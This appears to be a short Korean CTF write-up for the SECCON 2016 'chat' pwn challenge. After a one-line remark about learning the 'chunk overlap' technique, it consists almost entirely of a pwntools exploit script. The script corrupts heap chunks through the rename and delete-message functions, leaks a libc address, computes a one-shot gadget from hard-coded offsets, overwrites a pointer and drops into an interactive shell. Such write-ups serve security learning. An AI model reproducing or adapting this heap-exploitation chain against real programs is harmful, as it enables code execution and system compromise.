SECCON CTF 2016 chat 본문
후기 : chunk overlap이라는 기법을 알게 되었당
from pwn import *
s = remote('localhost', 4000)  # single shared connection to the chat service; every helper below reads from and writes to it
def join(name):
    """Register a new account: choose menu item 1, then answer the name prompt with *name*.

    Each prompt is echoed to stdout before the reply is sent, so the
    transcript of the exchange stays visible while the script runs.
    """
    for prompt, reply in (('menu > ', '1'), ('name > ', name)):
        print(s.recvuntil(prompt))
        s.sendline(reply)
def login(name):
    """Authenticate as *name*: menu item 2 followed by the name prompt."""
    def answer(prompt, reply):
        # echo everything the service printed up to the prompt, then respond
        print(s.recvuntil(prompt))
        s.sendline(reply)
    answer('menu > ', '2')
    answer('name > ', name)
def showtime():
    """Select item 1 of the post-login menu (the one prompting with 'menu >> ')."""
    banner = s.recvuntil('menu >> ')
    print(banner)
    s.sendline('1')
def showdm():
    """Select item 2 of the post-login menu."""
    choice = '2'
    print(s.recvuntil('menu >> '))
    s.sendline(choice)
def showuser():
    """Select item 3 of the post-login menu; the caller reads the resulting output itself."""
    menu_text = s.recvuntil('menu >> ')
    print(menu_text)
    s.sendline('3')
def sendpm(input):
    """Select item 4 of the post-login menu and submit *input* at the message prompt.

    The parameter shadows the ``input`` builtin; the name is kept as-is so
    existing callers are unaffected, and the builtin is not used here.
    """
    steps = [('menu >> ', '4'), ('message >> ', input)]
    for prompt, reply in steps:
        print(s.recvuntil(prompt))
        s.sendline(reply)
def senddm(name,input):
    """Select item 5, then answer the name prompt with *name* and the message prompt with *input*.

    ``input`` shadows the builtin; kept for caller compatibility.
    """
    def reply_to(prompt, text):
        print(s.recvuntil(prompt))
        s.sendline(text)
    reply_to('menu >> ', '5')
    reply_to('name >> ', name)
    reply_to('message >> ', input)
def rmpm(num):
    """Select item 6 and answer the id prompt with ``str(num)``.

    *num* may be an int or an already-stringified id; it is converted with
    ``str`` before being sent either way.
    """
    for prompt, reply in (('menu >> ', '6'), ('id >> ', str(num))):
        print(s.recvuntil(prompt))
        s.sendline(reply)
def changename(input):
    """Select item 7 and submit *input* at the name prompt.

    ``input`` shadows the builtin; kept for caller compatibility. No length
    check is done here — whatever bytes the caller passes are sent verbatim.
    """
    menu_banner = s.recvuntil('menu >> ')
    print(menu_banner)
    s.sendline('7')
    name_prompt = s.recvuntil('name >> ')
    print(name_prompt)
    s.sendline(input)
def logout():
    """Select item 0 of the post-login menu."""
    pending = s.recvuntil('menu >> ')
    print(pending)
    s.sendline('0')
# --- interaction sequence; every step below talks to the shared connection `s` ---
join('a')
login('a')
sendpm('A'*100)  # 100-byte message submitted while logged in as 'a'
logout()
join('p')
login('a')
rmpm('1')  # remove the message with id 1
# 24 filler bytes followed by two 0xff bytes. The page's intro credits a
# "chunk overlap" technique; presumably these bytes reach past the name
# field, but that cannot be confirmed from the script alone.
changename('a'*24 + '\xff\xff')
logout()
join('c')
login('p')
# 80 filler bytes followed by three raw bytes (0x40 0x30 0x60); their
# meaning is target-specific and not visible on this page.
sendpm('a'*80 + '\x40\x30\x60')
showuser()
# Skip the listing up to the third '*' marker; the value of interest follows it.
print s.recvuntil('*')
print s.recvuntil('*')
print s.recvuntil('* ')
leak = u64(s.recv(6).ljust(8,'\x00'))  # 6 raw bytes, zero-padded to a qword, unpacked with pwntools' u64
libc_base = leak - 0x21e50  # hard-coded offset tied to the target's particular libc build (not shown on the page)
oneshot = libc_base + 0x4647c  # another build-specific offset; the name suggests a one-shot gadget — not verifiable here
print ('[*] main_got: ' + hex(leak))  # NOTE: label says main_got, but the value printed is the raw leak
print ('[*] libc_base: ' + hex(libc_base))
changename('A'*8 + p64(oneshot))  # 8 filler bytes, then the 8-byte little-endian packing of oneshot (p64)
s.interactive()  # hand the connection over to the operator